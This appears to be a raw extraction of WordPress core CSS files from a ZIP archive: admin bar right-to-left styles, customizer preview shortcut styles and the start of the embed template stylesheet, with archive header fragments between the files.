.copy-attachment-url { margin-bottom: 0; } #media-upload.wp-core-ui .button { padding: 0 10px 1px; min-height: 24px; line-height: 22px; font-size: 13px; } .media-frame.mode-grid .bulk-select .button { margin-bottom: 0; } /* Publish Metabox Options */ .wp-core-ui .save-post-status.button { position: relative; margin: 0 10px 0 14px; /* 14px right margin to match all other buttons */ } /* Reset responsive styles in Press This, Customizer */ .wp-core-ui.wp-customizer .button { font-size: 13px; line-height: 2.15384615; /* 28px */ min-height: 30px; margin: 0; vertical-align: inherit; } .wp-customizer .theme-overlay .theme-actions .button { margin-bottom: 5px; } .media-modal-content .media-toolbar-primary .media-button { margin-top: 10px; margin-right: 5px; } /* Reset responsive styles on Log in button on iframed login form */ .interim-login .button.button-large { min-height: 30px; line-height: 2; padding: 0 12px 2px; } } PK!{LaLaadmin-bar-rtl.cssnuȯ/*! This file is auto-generated */ html { --wp-admin--admin-bar--height: 32px; scroll-padding-top: var(--wp-admin--admin-bar--height); } #wpadminbar * { height: auto; width: auto; margin: 0; padding: 0; position: static; text-shadow: none; text-transform: none; letter-spacing: normal; font-size: 13px; font-weight: 400; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif; font-style: normal; line-height: 2.46153846; border-radius: 0; box-sizing: content-box; transition: none; -webkit-font-smoothing: subpixel-antialiased; /* Prevent Safari from switching to standard antialiasing on hover */ -moz-osx-font-smoothing: auto; /* Prevent Firefox from inheriting from themes that use other values */ } .rtl #wpadminbar * { font-family: Tahoma, sans-serif; } html:lang(he-il) .rtl #wpadminbar * { font-family: Arial, sans-serif; } #wpadminbar .ab-empty-item { cursor: default; } #wpadminbar .ab-empty-item, #wpadminbar a.ab-item, #wpadminbar > #wp-toolbar span.ab-label, #wpadminbar > #wp-toolbar span.noticon { color: #f0f0f1; } #wpadminbar #wp-admin-bar-site-name a.ab-item, #wpadminbar #wp-admin-bar-my-sites a.ab-item { white-space: nowrap; } #wpadminbar ul li:before, #wpadminbar ul li:after { content: normal; } #wpadminbar a, #wpadminbar a:hover, #wpadminbar a img, #wpadminbar a img:hover { border: none; text-decoration: none; background: none; box-shadow: none; } #wpadminbar a:focus, #wpadminbar a:active, #wpadminbar input[type="text"], #wpadminbar input[type="password"], #wpadminbar input[type="number"], #wpadminbar input[type="search"], #wpadminbar input[type="email"], #wpadminbar input[type="url"], #wpadminbar select, #wpadminbar textarea, #wpadminbar div { box-shadow: none; } #wpadminbar a:focus { /* Inherits transparent outline only visible in Windows High Contrast mode */ outline-offset: -1px; } #wpadminbar { direction: rtl; color: #c3c4c7; font-size: 13px; font-weight: 400; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif; line-height: 2.46153846; height: 32px; position: fixed; top: 0; right: 0; width: 100%; min-width: 600px; /* match the min-width of the body in wp-admin/css/common.css */ z-index: 99999; background: #1d2327; /* Only visible in Windows High Contrast mode */ outline: 1px solid transparent; } #wpadminbar .ab-sub-wrapper, #wpadminbar ul, #wpadminbar ul li { background: none; clear: none; list-style: none; margin: 0; padding: 0; position: relative; text-indent: 0; z-index: 99999; } #wpadminbar ul#wp-admin-bar-root-default>li { margin-left: 0; } #wpadminbar .quicklinks ul { text-align: right; } #wpadminbar li { float: right; } #wpadminbar .ab-empty-item { outline: none; } #wpadminbar .quicklinks a, #wpadminbar .quicklinks .ab-empty-item, #wpadminbar .shortlink-input { height: 32px; display: block; padding: 0 10px; margin: 0; } #wpadminbar .quicklinks > ul > li > a { padding: 0 7px 0 8px; } #wpadminbar .menupop .ab-sub-wrapper, #wpadminbar .shortlink-input { margin: 0; padding: 0; box-shadow: 0 3px 5px rgba(0, 0, 0, 0.2); background: #2c3338; display: none; position: absolute; float: none; } #wpadminbar .ab-top-menu > .menupop > .ab-sub-wrapper { min-width: 100%; } #wpadminbar .ab-top-secondary .menupop .ab-sub-wrapper { left: 0; right: auto; } #wpadminbar .ab-submenu { padding: 6px 0; } #wpadminbar .selected .shortlink-input { display: block; } #wpadminbar .quicklinks .menupop ul li { float: none; } #wpadminbar .quicklinks .menupop ul li a strong { font-weight: 600; } #wpadminbar .quicklinks .menupop ul li .ab-item, #wpadminbar .quicklinks .menupop ul li a strong, #wpadminbar .quicklinks .menupop.hover ul li .ab-item, #wpadminbar.nojs .quicklinks .menupop:hover ul li .ab-item, #wpadminbar .shortlink-input { line-height: 2; height: 26px; white-space: nowrap; min-width: 140px; } #wpadminbar .shortlink-input { width: 200px; } #wpadminbar.nojs li:hover > .ab-sub-wrapper, #wpadminbar li.hover > .ab-sub-wrapper { display: block; /* Only visible in Windows High Contrast mode */ outline: 1px solid transparent; } #wpadminbar .menupop li:hover > .ab-sub-wrapper, #wpadminbar .menupop li.hover > .ab-sub-wrapper { margin-right: 100%; margin-top: -32px; } #wpadminbar .ab-top-secondary .menupop li:hover > .ab-sub-wrapper, #wpadminbar .ab-top-secondary .menupop li.hover > .ab-sub-wrapper { margin-right: 0; right: inherit; left: 100%; } #wpadminbar:not(.mobile) .ab-top-menu > li > .ab-item:focus, #wpadminbar.nojq .quicklinks .ab-top-menu > li > .ab-item:focus, #wpadminbar:not(.mobile) .ab-top-menu > li:hover > .ab-item, #wpadminbar .ab-top-menu > li.hover > .ab-item { background: #2c3338; color: #72aee6; } #wpadminbar:not(.mobile) > #wp-toolbar li:hover span.ab-label, #wpadminbar > #wp-toolbar li.hover span.ab-label, #wpadminbar:not(.mobile) > #wp-toolbar a:focus span.ab-label { color: #72aee6; } #wpadminbar > #wp-toolbar > #wp-admin-bar-root-default .ab-icon, #wpadminbar .ab-icon, #wpadminbar .ab-item:before, .wp-admin-bar-arrow { position: relative; float: right; font: normal 20px/1 dashicons; padding: 4px 0; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; background-image: none !important; margin-left: 6px; } #wpadminbar .ab-icon:before, #wpadminbar .ab-item:before, #wpadminbar #adminbarsearch:before { color: #a7aaad; color: rgba(240, 246, 252, 0.6); } #wpadminbar .ab-icon:before, #wpadminbar .ab-item:before, #wpadminbar #adminbarsearch:before { position: relative; transition: color .1s ease-in-out; } #wpadminbar .ab-label { display: inline-block; height: 32px; } #wpadminbar .ab-submenu .ab-item { color: #c3c4c7; color: rgba(240, 246, 252, 0.7); } #wpadminbar .quicklinks .menupop ul li a, #wpadminbar .quicklinks .menupop ul li a strong, #wpadminbar .quicklinks .menupop.hover ul li a, #wpadminbar.nojs .quicklinks .menupop:hover ul li a { color: #c3c4c7; color: rgba(240, 246, 252, 0.7); } #wpadminbar .quicklinks .menupop ul li a:hover, #wpadminbar .quicklinks .menupop ul li a:focus, #wpadminbar .quicklinks .menupop ul li a:hover strong, #wpadminbar .quicklinks .menupop ul li a:focus strong, #wpadminbar .quicklinks .ab-sub-wrapper .menupop.hover > a, #wpadminbar .quicklinks .menupop.hover ul li a:hover, #wpadminbar .quicklinks .menupop.hover ul li a:focus, #wpadminbar .quicklinks .menupop.hover ul li div[tabindex]:hover, #wpadminbar .quicklinks .menupop.hover ul li div[tabindex]:focus, #wpadminbar.nojs .quicklinks .menupop:hover ul li a:hover, #wpadminbar.nojs .quicklinks .menupop:hover ul li a:focus, #wpadminbar li:hover .ab-icon:before, #wpadminbar li:hover .ab-item:before, #wpadminbar li a:focus .ab-icon:before, #wpadminbar li .ab-item:focus:before, #wpadminbar li .ab-item:focus .ab-icon:before, #wpadminbar li.hover .ab-icon:before, #wpadminbar li.hover .ab-item:before, #wpadminbar li:hover #adminbarsearch:before, #wpadminbar li #adminbarsearch.adminbar-focused:before { color: #72aee6; } #wpadminbar.mobile .quicklinks .ab-icon:before, #wpadminbar.mobile .quicklinks .ab-item:before { color: #c3c4c7; } #wpadminbar.mobile .quicklinks .hover .ab-icon:before, #wpadminbar.mobile .quicklinks .hover .ab-item:before { color: #72aee6; } #wpadminbar .menupop .menupop > .ab-item .wp-admin-bar-arrow:before, #wpadminbar .ab-top-secondary .menupop .menupop > .ab-item:before { position: absolute; font: normal 17px/1 dashicons; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } #wpadminbar .menupop .menupop > .ab-item { display: block; padding-left: 2em; } #wpadminbar .menupop .menupop > .ab-item .wp-admin-bar-arrow:before { top: 1px; left: 10px; padding: 4px 0; content: "\f141"; content: "\f139" / ''; color: inherit; } #wpadminbar .ab-top-secondary .menupop .menupop > .ab-item { padding-right: 2em; padding-left: 1em; } #wpadminbar .ab-top-secondary .menupop .menupop > .ab-item .wp-admin-bar-arrow:before { top: 1px; right: 6px; content: "\f139"; content: "\f141" / ''; } #wpadminbar .quicklinks .menupop ul.ab-sub-secondary { display: block; position: relative; left: auto; margin: 0; box-shadow: none; } #wpadminbar .quicklinks .menupop ul.ab-sub-secondary, #wpadminbar .quicklinks .menupop ul.ab-sub-secondary .ab-submenu { background: #3c434a; } #wpadminbar .quicklinks .menupop .ab-sub-secondary > li > a:hover, #wpadminbar .quicklinks .menupop .ab-sub-secondary > li .ab-item:focus a { color: #72aee6; } #wpadminbar .quicklinks a span#ab-updates { background: #f0f0f1; color: #2c3338; display: inline; padding: 2px 5px; font-size: 10px; font-weight: 600; border-radius: 10px; } #wpadminbar .quicklinks a:hover span#ab-updates { background: #fff; color: #000; } #wpadminbar .ab-top-secondary { float: left; } #wpadminbar ul li:last-child, #wpadminbar ul li:last-child .ab-item { box-shadow: none; } /** * Recovery Mode */ #wpadminbar #wp-admin-bar-recovery-mode { color: #fff; background-color: #d63638; } #wpadminbar .ab-top-menu > #wp-admin-bar-recovery-mode.hover >.ab-item, #wpadminbar.nojq .quicklinks .ab-top-menu > #wp-admin-bar-recovery-mode > .ab-item:focus, #wpadminbar:not(.mobile) .ab-top-menu > #wp-admin-bar-recovery-mode:hover > .ab-item, #wpadminbar:not(.mobile) .ab-top-menu > #wp-admin-bar-recovery-mode > .ab-item:focus { color: #fff; background-color: #d63638; } /** * My Account */ #wp-admin-bar-my-account > ul { min-width: 198px; } #wp-admin-bar-my-account:not(.with-avatar) > .ab-item { display: inline-block; } #wp-admin-bar-my-account > .ab-item:before { content: "\f110"; content: "\f110" / ''; top: 2px; float: left; margin-right: 6px; margin-left: 0; } #wp-admin-bar-my-account.with-avatar > .ab-item:before { display: none; content: none; } #wp-admin-bar-my-account.with-avatar > ul { min-width: 270px; } #wpadminbar #wp-admin-bar-user-actions > li { margin-right: 16px; margin-left: 16px; } #wpadminbar #wp-admin-bar-user-actions.ab-submenu { padding: 6px 0 12px; } #wpadminbar #wp-admin-bar-my-account.with-avatar #wp-admin-bar-user-actions > li { margin-right: 88px; } #wpadminbar #wp-admin-bar-user-info { margin-top: 6px; margin-bottom: 15px; height: auto; background: none; } #wp-admin-bar-user-info .avatar { position: absolute; right: -72px; top: 4px; width: 64px; height: 64px; } #wpadminbar #wp-admin-bar-user-info a { background: none; height: auto; } #wpadminbar #wp-admin-bar-user-info span { background: none; padding: 0; height: 18px; } #wpadminbar #wp-admin-bar-user-info .display-name, #wpadminbar #wp-admin-bar-user-info .username { display: block; } #wpadminbar #wp-admin-bar-user-info .username { color: #a7aaad; font-size: 11px; } #wpadminbar #wp-admin-bar-my-account.with-avatar > .ab-empty-item img, #wpadminbar #wp-admin-bar-my-account.with-avatar > a img { width: auto; height: 16px; padding: 0; border: 1px solid #8c8f94; background: #f0f0f1; line-height: 1.84615384; vertical-align: middle; margin: -4px 6px 0 0; float: none; display: inline; } /** * WP Logo */ #wpadminbar #wp-admin-bar-wp-logo > .ab-item .ab-icon { width: 15px; height: 20px; margin-left: 0; padding: 6px 0 5px; } #wpadminbar #wp-admin-bar-wp-logo > .ab-item { padding: 0 7px; } #wpadminbar #wp-admin-bar-wp-logo > .ab-item .ab-icon:before { content: "\f120"; content: "\f120" / ''; top: 2px; } /* * My Sites & Site Title */ #wpadminbar .quicklinks li .blavatar { display: inline-block; vertical-align: middle; font: normal 16px/1 dashicons !important; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; color: #f0f0f1; } #wpadminbar .quicklinks li a:hover .blavatar, #wpadminbar .quicklinks li a:focus .blavatar, #wpadminbar .quicklinks .ab-sub-wrapper .menupop.hover > a .blavatar { color: #72aee6; } #wpadminbar .quicklinks li img.blavatar, #wpadminbar .quicklinks li div.blavatar:before { height: 16px; width: 16px; margin: 0 -2px 2px 8px; } #wpadminbar .quicklinks li div.blavatar:before { content: "\f120"; content: "\f120" / ''; display: inline-block; } #wpadminbar #wp-admin-bar-appearance { margin-top: -12px; } #wpadminbar #wp-admin-bar-my-sites > .ab-item:before, #wpadminbar #wp-admin-bar-site-name > .ab-item:before { content: "\f541"; content: "\f541" / ''; top: 2px; } #wpadminbar #wp-admin-bar-site-editor > .ab-item:before { content: "\f100"; content: "\f100" / ''; top: 2px; } #wpadminbar #wp-admin-bar-customize > .ab-item:before { content: "\f540"; content: "\f540" / ''; top: 2px; } #wpadminbar #wp-admin-bar-edit > .ab-item:before { content: "\f464"; content: "\f464" / ''; top: 2px; } #wpadminbar #wp-admin-bar-site-name > .ab-item:before { content: "\f226"; content: "\f226" / ''; } .wp-admin #wpadminbar #wp-admin-bar-site-name > .ab-item:before { content: "\f102"; content: "\f102" / ''; } /** * Comments */ #wpadminbar #wp-admin-bar-comments .ab-icon { margin-left: 6px; } #wpadminbar #wp-admin-bar-comments .ab-icon:before { content: "\f101"; content: "\f101" / ''; top: 3px; } #wpadminbar #wp-admin-bar-comments .count-0 { opacity: .5; } /** * New Content */ #wpadminbar #wp-admin-bar-new-content .ab-icon:before { content: "\f132"; content: "\f132" / ''; top: 4px; } /** * Updates */ #wpadminbar #wp-admin-bar-updates .ab-icon:before { content: "\f463"; content: "\f463" / ''; top: 2px; } #wpadminbar #wp-admin-bar-updates.spin .ab-icon:before { display: inline-block; animation: rotation 2s infinite linear; } @media (prefers-reduced-motion: reduce) { #wpadminbar #wp-admin-bar-updates.spin .ab-icon:before { animation: none; } } /** * Search */ #wpadminbar #wp-admin-bar-search .ab-item { padding: 0; background: transparent; } #wpadminbar #adminbarsearch { position: relative; height: 32px; padding: 0 2px; z-index: 1; } #wpadminbar #adminbarsearch:before { position: absolute; top: 6px; right: 5px; z-index: 20; font: normal 20px/1 dashicons !important; content: "\f179"; content: "\f179" / ''; speak: never; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } /* The admin bar search field needs to reset many styles that might be inherited from the active Theme CSS. See ticket #40313. */ #wpadminbar > #wp-toolbar > #wp-admin-bar-top-secondary > #wp-admin-bar-search #adminbarsearch input.adminbar-input { display: inline-block; float: none; position: relative; z-index: 30; font-size: 13px; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif; line-height: 1.84615384; text-indent: 0; height: 24px; width: 24px; max-width: none; padding: 0 24px 0 3px; margin: 0; color: #c3c4c7; background-color: rgba(255, 255, 255, 0); border: none; outline: none; cursor: pointer; box-shadow: none; box-sizing: border-box; transition-duration: 400ms; transition-property: width, background; transition-timing-function: ease; } #wpadminbar > #wp-toolbar > #wp-admin-bar-top-secondary > #wp-admin-bar-search #adminbarsearch input.adminbar-input:focus { z-index: 10; color: #000; width: 200px; background-color: rgba(255, 255, 255, 0.9); cursor: text; border: 0; } #wpadminbar #adminbarsearch .adminbar-button { display: none; } /** * Customize support classes */ .no-customize-support .hide-if-no-customize, .customize-support .hide-if-customize, .no-customize-support #wpadminbar .hide-if-no-customize, .no-customize-support.wp-core-ui .hide-if-no-customize, .no-customize-support .wp-core-ui .hide-if-no-customize, .customize-support #wpadminbar .hide-if-customize, .customize-support.wp-core-ui .hide-if-customize, .customize-support .wp-core-ui .hide-if-customize { display: none; } /* Skip link */ #wpadminbar .screen-reader-text, #wpadminbar .screen-reader-text span { border: 0; clip-path: inset(50%); height: 1px; margin: -1px; overflow: hidden; padding: 0; position: absolute; width: 1px; word-wrap: normal !important; } #wpadminbar .screen-reader-shortcut { position: absolute; top: -1000em; right: 6px; height: auto; width: auto; display: block; font-size: 14px; font-weight: 600; padding: 15px 23px 14px; background: #f0f0f1; color: #2271b1; z-index: 100000; line-height: normal; text-decoration: none; } #wpadminbar .screen-reader-shortcut:focus { top: 7px; background: #f0f0f1; box-shadow: 0 0 2px 2px rgba(0, 0, 0, 0.6); } @media screen and (max-width: 782px) { html { --wp-admin--admin-bar--height: 46px; } /* Toolbar Touchification*/ html #wpadminbar { height: 46px; min-width: 240px; /* match the min-width of the body in wp-admin/css/common.css */ } #wpadminbar * { font-size: 14px; font-weight: 400; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif; line-height: 2.28571428; } #wpadminbar .quicklinks > ul > li > a, #wpadminbar .quicklinks .ab-empty-item { padding: 0; height: 46px; line-height: 3.28571428; width: auto; } #wpadminbar .ab-icon { font: 40px/1 dashicons !important; margin: 0; padding: 0; width: 52px; height: 46px; text-align: center; } #wpadminbar .ab-icon:before { text-align: center; } #wpadminbar .ab-submenu { padding: 0; } #wpadminbar #wp-admin-bar-site-name a.ab-item, #wpadminbar #wp-admin-bar-my-sites a.ab-item, #wpadminbar #wp-admin-bar-my-account a.ab-item { text-overflow: clip; } #wpadminbar .quicklinks .menupop ul li .ab-item, #wpadminbar .quicklinks .menupop ul li a strong, #wpadminbar .quicklinks .menupop.hover ul li .ab-item, #wpadminbar.nojs .quicklinks .menupop:hover ul li .ab-item, #wpadminbar .shortlink-input { line-height: 1.6; } #wpadminbar .ab-label { border: 0; clip-path: inset(50%); height: 1px; margin: -1px; overflow: hidden; padding: 0; position: absolute; width: 1px; word-wrap: normal !important; } #wpadminbar .menupop li:hover > .ab-sub-wrapper, #wpadminbar .menupop li.hover > .ab-sub-wrapper { margin-top: -46px; } #wpadminbar .ab-top-menu .menupop .ab-sub-wrapper .menupop > .ab-item { padding-left: 30px; } #wpadminbar .menupop .menupop > .ab-item:before { top: 10px; left: 6px; } #wpadminbar .ab-top-menu > .menupop > .ab-sub-wrapper .ab-item { font-size: 16px; padding: 8px 16px; } #wpadminbar .ab-top-menu > .menupop > .ab-sub-wrapper a:empty { display: none; } /* WP logo */ #wpadminbar #wp-admin-bar-wp-logo > .ab-item { padding: 0; } #wpadminbar #wp-admin-bar-wp-logo > .ab-item .ab-icon { padding: 0; width: 52px; height: 46px; text-align: center; vertical-align: top; } #wpadminbar #wp-admin-bar-wp-logo > .ab-item .ab-icon:before { font: 28px/1 dashicons !important; top: -3px; } #wpadminbar .ab-icon, #wpadminbar .ab-item:before { padding: 0; } /* My Sites and "Site Title" menu */ #wpadminbar #wp-admin-bar-my-sites > .ab-item, #wpadminbar #wp-admin-bar-site-name > .ab-item, #wpadminbar #wp-admin-bar-site-editor > .ab-item, #wpadminbar #wp-admin-bar-customize > .ab-item, #wpadminbar #wp-admin-bar-edit > .ab-item, #wpadminbar #wp-admin-bar-my-account > .ab-item { text-indent: 100%; white-space: nowrap; overflow: hidden; width: 52px; padding: 0; color: #a7aaad; /* @todo not needed? this text is hidden */ position: relative; } #wpadminbar > #wp-toolbar > #wp-admin-bar-root-default .ab-icon, #wpadminbar .ab-icon, #wpadminbar .ab-item:before { padding: 0; margin-left: 0; } #wpadminbar #wp-admin-bar-edit > .ab-item:before, #wpadminbar #wp-admin-bar-my-sites > .ab-item:before, #wpadminbar #wp-admin-bar-site-name > .ab-item:before, #wpadminbar #wp-admin-bar-site-editor > .ab-item:before, #wpadminbar #wp-admin-bar-customize > .ab-item:before, #wpadminbar #wp-admin-bar-my-account > .ab-item:before { display: block; text-indent: 0; font: normal 32px/1 dashicons; top: 7px; width: 52px; text-align: center; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } #wpadminbar #wp-admin-bar-appearance { margin-top: 0; } #wpadminbar .quicklinks li .blavatar:before { display: none; } /* Search */ #wpadminbar #wp-admin-bar-search { display: none; } /* New Content */ #wpadminbar #wp-admin-bar-new-content .ab-icon:before { top: 0; line-height: 1.26; height: 46px !important; text-align: center; width: 52px; display: block; } /* Updates */ #wpadminbar #wp-admin-bar-updates { text-align: center; } #wpadminbar #wp-admin-bar-updates .ab-icon:before { top: 3px; } /* Comments */ #wpadminbar #wp-admin-bar-comments .ab-icon { margin: 0; } #wpadminbar #wp-admin-bar-comments .ab-icon:before { display: block; font-size: 34px; height: 46px; line-height: 1.38235294; top: 0; } /* My Account */ #wpadminbar #wp-admin-bar-my-account > a { position: relative; white-space: nowrap; text-indent: 150%; /* More than 100% indention is needed since this element has padding */ width: 28px; padding: 0 10px; overflow: hidden; /* Prevent link text from forcing horizontal scrolling on mobile */ } #wpadminbar .quicklinks li#wp-admin-bar-my-account.with-avatar > a img { position: absolute; top: 13px; left: 10px; width: 26px; height: 26px; } #wpadminbar #wp-admin-bar-user-actions.ab-submenu { padding: 0; } #wpadminbar #wp-admin-bar-user-actions.ab-submenu img.avatar { display: none; } #wpadminbar #wp-admin-bar-my-account.with-avatar #wp-admin-bar-user-actions > li { margin: 0; } #wpadminbar #wp-admin-bar-user-info .display-name { height: auto; font-size: 16px; line-height: 1.5; color: #f0f0f1; } #wpadminbar #wp-admin-bar-user-info a { padding-top: 4px; } #wpadminbar #wp-admin-bar-user-info .username { line-height: 0.8 !important; margin-bottom: -2px; } /* Show only default top level items */ #wp-toolbar > ul > li { display: none; } #wpadminbar li#wp-admin-bar-menu-toggle, #wpadminbar li#wp-admin-bar-wp-logo, #wpadminbar li#wp-admin-bar-my-sites, #wpadminbar li#wp-admin-bar-updates, #wpadminbar li#wp-admin-bar-site-name, #wpadminbar li#wp-admin-bar-site-editor, #wpadminbar li#wp-admin-bar-customize, #wpadminbar li#wp-admin-bar-new-content, #wpadminbar li#wp-admin-bar-edit, #wpadminbar li#wp-admin-bar-comments, #wpadminbar li#wp-admin-bar-my-account { display: block; } /* Allow dropdown list items to appear normally */ #wpadminbar li:hover ul li, #wpadminbar li.hover ul li, #wpadminbar li:hover ul li:hover ul li { display: list-item; } /* Override default min-width so dropdown lists aren't stretched to 100% viewport width at responsive sizes. */ #wpadminbar .ab-top-menu > .menupop > .ab-sub-wrapper { min-width: fit-content; } #wpadminbar ul#wp-admin-bar-root-default > li { margin-left: 0; } /* Experimental fix for touch toolbar dropdown positioning */ #wpadminbar .ab-top-menu, #wpadminbar .ab-top-secondary, #wpadminbar #wp-admin-bar-wp-logo, #wpadminbar #wp-admin-bar-my-sites, #wpadminbar #wp-admin-bar-site-name, #wpadminbar #wp-admin-bar-updates, #wpadminbar #wp-admin-bar-comments, #wpadminbar #wp-admin-bar-new-content, #wpadminbar #wp-admin-bar-edit, #wpadminbar #wp-admin-bar-my-account { position: static; } .network-admin #wpadminbar ul#wp-admin-bar-top-secondary > li#wp-admin-bar-my-account { margin-left: 0; } /* Realign arrows on taller responsive submenus */ #wpadminbar .ab-top-secondary .menupop .menupop > .ab-item:before { top: 10px; right: 0; } } /* Smartphone */ @media screen and (max-width: 600px) { #wpadminbar { position: absolute; } #wp-responsive-overlay { position: fixed; top: 0; right: 0; width: 100%; height: 100%; z-index: 400; } #wpadminbar .ab-top-menu > .menupop > .ab-sub-wrapper { width: 100%; right: 0; } #wpadminbar .menupop .menupop > .ab-item:before { display: none; } #wpadminbar #wp-admin-bar-wp-logo.menupop .ab-sub-wrapper { margin-right: 0; } #wpadminbar .ab-top-menu > .menupop li > .ab-sub-wrapper { margin: 0; width: 100%; top: auto; right: auto; position: relative; } #wpadminbar .ab-top-menu > .menupop li > .ab-sub-wrapper .ab-item { font-size: 16px; padding: 6px 30px 19px 15px; } #wpadminbar li:hover ul li ul li { display: list-item; } #wpadminbar li#wp-admin-bar-wp-logo, #wpadminbar li#wp-admin-bar-updates { display: none; } /* Make submenus full-width at this size */ #wpadminbar .ab-top-menu > .menupop li > .ab-sub-wrapper { position: static; box-shadow: none; } } /* Very narrow screens */ @media screen and (max-width: 400px) { #wpadminbar li#wp-admin-bar-comments { display: none; } } PK!>]UUcustomize-preview-rtl.cssnu&1i/*! This file is auto-generated */ .customize-partial-refreshing { opacity: 0.25; transition: opacity 0.25s; cursor: progress; } /* Override highlight when refreshing */ .customize-partial-refreshing.widget-customizer-highlighted-widget { box-shadow: none; } /* Make shortcut buttons essentially invisible */ .widget .customize-partial-edit-shortcut, .customize-partial-edit-shortcut { position: absolute; float: right; width: 1px; /* required to have a size to be focusable in Safari */ height: 1px; padding: 0; margin: -1px -1px 0 0; border: 0; background: transparent; color: transparent; box-shadow: none; outline: none; z-index: 5; } /** * Styles for the actual shortcut * * Note that some properties are overly verbose to prevent theme interference. */ .widget .customize-partial-edit-shortcut button, .customize-partial-edit-shortcut button { position: absolute; right: -30px; top: 2px; color: #fff; width: 30px; height: 30px; min-width: 30px; min-height: 30px; line-height: 1 !important; font-size: 18px; z-index: 5; background: #3582c4 !important; border-radius: 50%; border: 2px solid #fff; box-shadow: 0 2px 1px rgba(60, 67, 74, 0.15); text-align: center; cursor: pointer; box-sizing: border-box; padding: 3px; animation-fill-mode: both; animation-duration: .4s; opacity: 0; pointer-events: none; text-shadow: 0 -1px 1px #135e96, -1px 0 1px #135e96, 0 1px 1px #135e96, 1px 0 1px #135e96; } .wp-custom-header .customize-partial-edit-shortcut button { right: 2px } .customize-partial-edit-shortcut button svg { fill: #fff; min-width: 20px; min-height: 20px; width: 20px; height: 20px; margin: auto; } .customize-partial-edit-shortcut button:hover { background: #4f94d4 !important; /* matches primary buttons */ } .customize-partial-edit-shortcut button:focus { box-shadow: 0 0 0 2px #4f94d4; } body.customize-partial-edit-shortcuts-shown .customize-partial-edit-shortcut button { animation-name: customize-partial-edit-shortcut-bounce-appear; pointer-events: auto; } body.customize-partial-edit-shortcuts-hidden .customize-partial-edit-shortcut button { animation-name: customize-partial-edit-shortcut-bounce-disappear; pointer-events: none; } .page-sidebar-collapsed .customize-partial-edit-shortcut button, .customize-partial-edit-shortcut-hidden .customize-partial-edit-shortcut button { visibility: hidden; } @keyframes customize-partial-edit-shortcut-bounce-appear { from, 20%, 40%, 60%, 80%, to { animation-timing-function: cubic-bezier(0.215, 0.610, 0.355, 1.000); } 0% { opacity: 0; transform: scale3d(.3, .3, .3); } 20% { transform: scale3d(1.1, 1.1, 1.1); } 40% { transform: scale3d(.9, .9, .9); } 60% { opacity: 1; transform: scale3d(1.03, 1.03, 1.03); } 80% { transform: scale3d(.97, .97, .97); } to { opacity: 1; transform: scale3d(1, 1, 1); } } @keyframes customize-partial-edit-shortcut-bounce-disappear { from, 20%, 40%, 60%, 80%, to { animation-timing-function: cubic-bezier(0.215, 0.610, 0.355, 1.000); } 0% { opacity: 1; transform: scale3d(1, 1, 1); } 20% { transform: scale3d(.97, .97, .97); } 40% { opacity: 1; transform: scale3d(1.03, 1.03, 1.03); } 60% { transform: scale3d(.9, .9, .9); } 80% { transform: scale3d(1.1, 1.1, 1.1); } to { opacity: 0; transform: scale3d(.3, .3, .3); } } @media screen and (max-width: 800px) { .widget .customize-partial-edit-shortcut button, .customize-partial-edit-shortcut button { right: -32px; } } @media screen and (max-width: 320px) { .widget .customize-partial-edit-shortcut button, .customize-partial-edit-shortcut button { right: -30px; } } PK! ңwp-embed-template.cssnuȯhtml, body { padding: 0; margin: 0; } body { font-family: sans-serif; } /* Text meant only for screen readers */ .screen-reader-text { border: 0; clip-path: inset(50%); height: 1px; margin: -1px; overflow: hidden; padding: 0; position: absolute; width: 1px; word-wrap: normal !important; } /* Dashicons */ .dashicons { display: inline-block; width: 20px; height: 20px; background-color: transparent; background-repeat: no-repeat; background-size: 20px; background-position: center; transition: background .1s ease-in; position: relative; top: 5px; } .dashicons-no { background-image: url("data:image/svg+xml;charset=utf8,%3Csvg%20xmlns%3D%27http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%27%20viewBox%3D%270%200%2020%2020%27%3E%3Cpath%20d%3D%27M15.55%2013.7l-2.19%202.06-3.42-3.65-3.64%203.43-2.06-2.18%203.64-3.43-3.42-3.64%202.18-2.06%203.43%203.64%203.64-3.42%202.05%202.18-3.64%203.43z%27%20fill%3D%27%23fff%27%2F%3E%3C%2Fsvg%3E"); } .dashicons-admin-comments { background-image: url("data:image/svg+xml;charset=utf8,%3Csvg%20xmlns%3D%27http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%27%20viewBox%3D%270%200%2020%2020%27%3E%3Cpath%20d%3D%27M5%202h9q.82%200%201.41.59T16%204v7q0%20.82-.59%201.41T14%2013h-2l-5%205v-5H5q-.82%200-1.41-.59T3%2011V4q0-.82.59-1.41T5%202z%27%20fill%3D%27%23646970%27%2F%3E%3C%2Fsvg%3E"); } .wp-embed-comments a:hover .dashicons-admin-comments { background-image: url("data:image/svg+xml;charset=utf8,%3Csvg%20xmlns%3D%27http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%27%20viewBox%3D%270%200%2020%2020%27%3E%3Cpath%20d%3D%27M5%202h9q.82%200%201.41.59T16%204v7q0%20.82-.59%201.41T14%2013h-2l-5%205v-5H5q-.82%200-1.41-.59T3%2011V4q0-.82.59-1.41T5%202z%27%20fill%3D%27%23135e96%27%2F%3E%3C%2Fsvg%3E"); } .dashicons-share { background-image: 